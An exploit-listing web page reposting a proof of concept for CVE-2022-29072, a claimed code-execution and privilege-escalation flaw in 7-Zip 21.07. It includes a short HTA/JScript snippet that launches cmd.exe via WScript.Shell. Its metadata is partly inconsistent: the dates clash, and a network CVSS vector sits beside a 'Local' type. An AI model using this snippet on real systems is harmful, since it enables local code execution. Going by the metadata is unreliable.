7-Zip 21.07 Code Execution / Privilege Escalation

CVE Category Price Severity
CVE-2022-29072 CWE-264 Not specified High
Author Risk Exploitation Type Date
Not specified High Local 2022-04-19
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

7-Zip 21.07 Code Execution / Privilege Escalation
# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation
# Exploit Author:  Kagan Capar
# Date: 2020-04-12
# Vendor homepage:
# Software link:
# Version: 21.07 and all versions
# Tested On: Windows 10 Pro (x64)
# References:

# About:
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.

# Proof of Concept:
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum